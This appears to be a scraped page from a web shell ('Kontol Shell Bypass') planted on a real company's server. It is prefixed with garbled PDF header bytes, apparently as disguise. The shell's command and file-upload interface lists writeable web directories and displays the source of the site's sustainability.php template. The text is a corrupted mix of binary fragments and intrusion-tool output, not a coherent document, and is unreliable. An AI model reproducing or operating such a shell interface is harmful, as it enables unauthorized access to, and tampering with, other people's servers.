%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardacorporation.net/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardacorporation.net/application/views/sustainability.php
<?php 
$banner_image  = $bannerArray['banner_image'] <>'' ? base_url('attachments/banner_images/'.$bannerArray['banner_image']) : base_url('assets/imgs/sustainable.jpg');
$banner_text = $bannerArray['banner_text'] <> '' ? $bannerArray['banner_text'] : 'Sustainable Living';
?>
<section class="innerpage-slider">
	<div class="innerpage-sliderin">
    	 <img src="<?= $banner_image ?>" width="1440" height="524"  alt="Sharda Corporation" />
         <div class="innerpage-content">
         <div class="container">
         <div class="row">
         <div class="col-md-9">
                	 <div class="heading">
                     	<div class="leaf wow bounceInLeft" data-wow-offset="300"> <img src="<?= base_url('assets/imgs/leaf5.png') ?>"  width="340" height="414"  alt="Sharda Corporation" /></div>
                        <h1><?= $banner_text ?></h1>
                    
                     </div>
                </div>
         </div>       
         </div>
         </div>
   	</div>          
</section>

<section class="business-detail sustainable">
	<div class="container-fluid">
    <div class="row">
    	<div class="col-md-1"> </div>
    	<div class="col-md-4">
    		 
            	 
		 </div>
         
         <div class="col-md-7">
         	<div class="sharda-heading">
           <h2>
           <?= $sustainabledetails['title'] ?>
            <!-- <strong>Our Commitment to</strong> Sustainbility -->
            </h2>

			
            </div>
            
         </div>
   		</div>
	<div class="row">
    	<div class="col-md-1"> </div>
    	<div class="col-md-4">
    		<div class="business-1">
            	<!-- <h4>Overview</h4>
            	<p>
</p>			 -->
              <?= html_entity_decode($sustainabledetails['description']) ?>
             <a href="#business-striky" class="button2"><span>Discover More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a>
            
            </div>
            	 
		 </div>
         
         <div class="col-md-7">
         <div class="video-sec">
        <div class="leaf-2 wow bounceInRight" data-wow-offset="300"><img src="<?= base_url('assets/imgs/leaf5.png') ?>"  width="320" height="390" alt="Sharda Corporation" /></div>
         	<!-- <iframe width="100%" height="450" src="https://www.youtube.com/embed/bKqIg6V4kcg" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe> -->
            <?php if(!empty($sustainabledetails['youtube_url'])){
              $video_id = explode("?v=",$sustainabledetails['youtube_url']);
              $video_id = $video_id[1];
              ?>
            <iframe width="100%" height="450" src="https://www.youtube.com/embed/<?=$video_id?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>
           <?php } else if(!empty($sustainabledetails['aboutus_image'])){?>
           <div class="div-frame">
         	<img src="<?= base_url('attachments/aboutus_images/'.$sustainabledetails['aboutus_image']); ?> "  width="801" height="428" alt="Sharda Corporation" />
            </div>
         <?php }?>
            </div>
         </div>
   		</div>
	</div>
</section>	
<section class="sec-uilist" id="business-striky">
<div class="container">
    	 <div class="row">
         <div class="col-md-12">
<div class="ul-list">
            	<ul>
                	<li><a class="tablinks active" href="#our_strategy" onclick="openCity(event, 'our_strategy')">Our Strategy</a></li>
                    <li><a class="tablinks" href="#our_goal" onclick="openCity(event, 'our_goal')">Our Goal</a></li>
                    <li><a class="tablinks" href="#our_initiatives" onclick="openCity(event, 'our_initiatives')">Our Initiatives</a></li>
                	 
                </ul>
            </div>
            </div>
            </div>
            </div>
</section>
 	<section class="business-detail sustainable1 sustainable-new">
    <div class="container">
    	 <div class="row">
         <div class="col-md-12">
         	
            
            <?php foreach($sustainableArray as $row){ ?>   

             <div class="sustainable-in" id="<?=$row['category']?>">
             <div class="blank"></div>
                <div class="images">
                    <img src="<?=base_url('attachments/sustainability_images/'.$row['sustainable_image'])?>"  width="533" height="auto" alt="<?=$row['title']?>" />
                </div>
                <div class="content">
                <h4><?=$row['title']?></h4>
                	<?=html_entity_decode($row['description'])?>

				<!-- <a href="#" class="button2"><span>Read More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a> -->
                </div>
            
            </div>
            
            <?php }?>
             <!-- <div class="sustainable-in">
            	
                <div class="images">
            		<h4>Our Strategy towards Sustainable Growth</h4>
                    <img src="http://13.126.253.70/shardagroup/assets/imgs/suatainable-img.png"  />
                </div>
                <div class="content">
                	<p>Contributing to sustainable development has become a core element of Sharda’s corporate strategy. We are increasingly focusing our activities on providing more people in all the regions of the world with access to health care and food and devising solutions to the challenges presented by climate change and protecting the environment.
</p>
				<a href="#" class="button2"><span>Read More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a>
                </div>
            
            </div>
             <div class="sustainable-in">
            	
                <div class="images">
            		<h4>Our Strategy towards Sustainable Growth</h4>
                    <img src="http://13.126.253.70/shardagroup/assets/imgs/suatainable-img.png"  />
                </div>
                <div class="content">
                	<p>Contributing to sustainable development has become a core element of Sharda’s corporate strategy. We are increasingly focusing our activities on providing more people in all the regions of the world with access to health care and food and devising solutions to the challenges presented by climate change and protecting the environment.
</p>
				<a href="#" class="button2"><span>Read More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a>
                </div>
            
            </div>
             <div class="sustainable-in">
            	
                <div class="images">
            		<h4>Our Strategy towards Sustainable Growth</h4>
                    <img src="http://13.126.253.70/shardagroup/assets/imgs/suatainable-img.png"  />
                </div>
                <div class="content">
                	<p>Contributing to sustainable development has become a core element of Sharda’s corporate strategy. We are increasingly focusing our activities on providing more people in all the regions of the world with access to health care and food and devising solutions to the challenges presented by climate change and protecting the environment.
</p>
				<a href="#" class="button2"><span>Read More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a>
                </div>
            
            </div> -->
        </div>
          
         </div>
        
    </div> 
    
</section>
<script src="<?=base_url('assets/js/jquery-2.2.0.min.js')?>"></script>

Kontol Shell Bypass